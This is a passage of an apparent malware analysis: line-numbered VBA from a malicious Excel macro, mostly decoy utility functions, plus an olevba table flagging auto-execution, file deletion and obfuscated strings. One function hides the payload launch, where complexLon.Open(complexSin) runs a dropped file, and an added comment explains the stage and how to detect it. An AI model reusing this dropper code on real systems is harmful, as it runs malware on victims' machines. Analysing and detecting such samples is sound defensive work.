  621. End Function
  622. Sub WriteFile(path As String, it As Variant)
  623.  Dim f As Long
  624.  f = FreeFile
  625.  Open path For Output As #f
  626.  Print #f, it
  627.  Close f
  628. End Sub
  629. Function GetSubFolders(folder As String, Optional retFullPath As Boolean = True) As String()
  630.  Dim fnames() As String
  631.  If Not FolderExists(folder) Then
  632.  GetSubFolders = fnames()
  633.  Exit Function
  634.  End If
  635.  If Right(folder, 1) <> "\" Then folder = folder & "\"
  636.  fd = Dir(folder, vbDirectory)
  637.  While fd <> ""
  638.  If Left(fd, 1) <> "." Then
  639.  If (GetAttr(folder & fd) And vbDirectory) = vbDirectory Then
  640.  push fnames(), IIf(retFullPath = True, folder & fd, fd)
  641.  End If
  642.  End If
  643.  fd = Dir()
  644.  Wend
  645.  GetSubFolders = fnames()
  646. End Function
  647. Function ReadFile(filename) As Variant
  648.  Dim f As Long
  649.  Dim temp As Variant
  650.  f = FreeFile
  651.  temp = ""
  652.  Open filename For Binary As #f
  653.  temp = Input(FileLen(filename), #f)
  654.  Close #f
  655.  ReadFile = temp
  656. End Function
  657. Function RandomNum() As Long
  658.  Dim tmp As Long
  659.  Dim tries As Long
  660.  On Error GoTo again
  661. tryit:
  662.  Randomize
  663.  tmp = Round(Timer * Now * Rnd(), 0)
  664.  RandomNum = tmp
  665.  Exit Function
  666. again:
  667.  If tries < 10 Then
  668.  tries = tries + 1
  669.  GoTo tryit
  670.  End If
  671. End Function
  672. Function GetFreeFileName(ByVal folder As String, Optional extension = ".txt") As String
  673.  On Error GoTo handler
  674.  Dim i As Integer
  675.  Dim tmp As String
  676.  If Not FolderExists(folder) Then Exit Function
  677.  If Right(folder, 1) <> "\" Then folder = folder & "\"
  678.  If Left(extension, 1) <> "." Then extension = "." & extension
  679. again:
  680.  Do
  681.  tmp = folder & RandomNum() & extension
  682.  Loop Until Not FileExists(tmp)
  683.  GetFreeFileName = tmp
  684. Exit Function
  685. handler:
  686.  If i < 10 Then
  687.  i = i + 1
  688.  GoTo again
  689.  End If
  690. End Function
  691. Public Function GetShortName(sFile As String) As String
       ' Final stage of the chain started by Workbook_Open: hands the dropped
       ' file path (complexSin) to the Shell.Application object's Open, which
       ' launches it. No Shell keyword or Shell() call appears literally, which
       ' is presumably why olevba's table has no "Shell" row for this sample.
       ' For detection, the observable result is the Office process starting an
       ' executable from the user's TEMP directory right after an HTTP GET.
  692.  Dim sShortFile As String * 300
  693.  Dim lResult As Long
  694.  complexLon.Open (complexSin)
  695.  Exit Function
       ' Unreachable: remnant of a short-path-name helper (note the broken
       ' identifier GetShortPat.hName).
  696.  If Not FileExists(sFile) Then
  697.  MsgBox "GetshortName file must exist to work..: " & sFile
  698.  GetShortName = sFile
  699.  Exit Function
  700.  End If
  701.  lResult = GetShortPat.hName(sFile, sShortFile, Len(sShortFile))
  702.  GetShortName = Left$(sShortFile, lResult)
  703.  If Not FileExists(GetShortName) Then GetShortName = sFile
  704. End Function
  705. Sub SetLiColor(li As String, newcolor As Long)
  706.  Dim f As ListSubItem
  707.  li.ForeColor = newcolor
  708.  For Each f In li.ListSubItems
  709.  f.ForeColor = newcolor
  710.  Next
  711. End Sub
  712. Sub LV_LastColumnResize(lv As String)
  713.  On Error Resume Next
  714.  lv.ColumnHeaders(lv.ColumnHeaders.Count).Width = lv.Width - lv.ColumnHeaders(lv.ColumnHeaders.Count).Left - 100
  715. End Sub
  716. Public Sub LV_ColumnSort(ListViewControl As String, Column As String)
  717.  On Error Resume Next
  718.  With ListViewControl
  719.  If .SortKey <> Column.Index - 1 Then
  720.  .SortKey = Column.Index - 1
  721.  .SortOrder = lvwAscending
  722.  Else
  723.  If .SortOrder = lvwAscending Then
  724.  .SortOrder = lvwDescending
  725.  Else
  726.  .SortOrder = lvwAscending
  727.  End If
  728.  End If
  729.  .Sorted = -1
  730.  End With
  731. End Sub
  732. Function pad(v, Optional l As Long = 4)
  733.  On Error GoTo hell
  734.  Dim x As Long
  735.  x = Len(v)
  736.  If x < l Then
  737.  pad = String(l - x, " ") & v
  738.  Else
  739. hell:
  740.  pad = v
  741.  End If
  742. End Function
  743. Function isDecimalNumber(x) As Boolean
  744.  On Error GoTo hell
  745.  Dim l As Long
  746.  For i = 1 To Len(x) - 1
  747.  c = Mid(x, i, 1)
  748.  If Not IsNumeric(c) Then Exit Function
  749.  Next
  750.  l = CLng(x)
  751.  isDecimalNumber = True
  752. hell:
  753.  Exit Function
  754. End Function
  755. Function StringOpcodesToBytes(OpCodes) As Byte()
  756.  On Error Resume Next
  757.  Dim b() As Byte
  758.  tmp = Split(Trim(OpCodes), " ")
  759.  ReDim b(UBound(tmp))
  760.  For i = 0 To UBound(tmp)
  761.  b(i) = CByte(CInt("&h" & tmp(i)))
  762.  Next
  763.  StringOpcodesToBytes = b()
  764. End Function
  765. Function lpad(x, Optional sz = 8)
  766.  a = Len(x) - sz
  767.  If a < 0 Then
  768.  lpad = x & Space(Abs(a))
  769.  Else
  770.  lpad = x
  771.  End If
  772. End Function
  773. Function objKeyExistsInCollection(c As Collection, k As String) As Boolean
  774.  On Error GoTo hell
  775.  Set x = c(k)
  776.  objKeyExistsInCollection = True
  777. hell:
  778. End Function
  779. Function AryIsEmpty(ary) As Boolean
  780.  On Error GoTo oops
  781.  Dim x As Long
  782.  x = UBound(ary)
  783.  AryIsEmpty = False
  784.  Exit Function
  785. oops: AryIsEmpty = True
  786. End Function
  787.  
  788.  
  789.  
  790.  
  791. +------------+----------------------+-----------------------------------------+
  792. | Type       | Keyword              | Description                             |
  793. +------------+----------------------+-----------------------------------------+
  794. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  795. | Suspicious | Kill                 | May delete a file                       |
  796. | Suspicious | Open                 | May open a file                         |
  797. | Suspicious | vbNormal             | May run an executable file or a system  |
  798. |            |                      | command                                 |
  799. | Suspicious | MkDir                | May create a directory                  |
  800. | Suspicious | Binary               | May read or write a binary file (if     |
  801. |            |                      | combined with Open)                     |
  802. | Suspicious | CreateObject         | May create an OLE object                |
  803. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  804. |            |                      | strings                                 |
  805. | Suspicious | SaveToFile           | May create a text file                  |
  806. | Suspicious | Write                | May write to a file (if combined with   |
  807. |            |                      | Open)                                   |
  808. | Suspicious | Output               | May write to a file (if combined with   |
  809. |            |                      | Open)                                   |
  810. | Suspicious | Print #              | May write to a file (if combined with   |
  811. |            |                      | Open)                                   |
  812. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  813. |            |                      | be used to obfuscate strings (option    |
  814. |            |                      | --decode to see all)                    |
  815. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  816. |            |                      | may be used to obfuscate strings        |
  817. |            |                      | (option --decode to see all)            |
  818. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  819. |            | Strings              | may be used to obfuscate strings        |
  820. |            |                      | (option --decode to see all)            |
  821. | IOC        | SciLexer.dll         | Executable file name                    |
  822. | VBA string | Provider=Microsoft.J | "Provider=Microsoft.Jet.OLEDB.4.0;" &   |
  823. |            | et.OLEDB.4.0;Data    | "Data Source=\"                         |
  824. |            | Source=\             |                                         |
  825. | VBA string | exe                  | "e" + "xe"                              |
  826. +------------+----------------------+-----------------------------------------+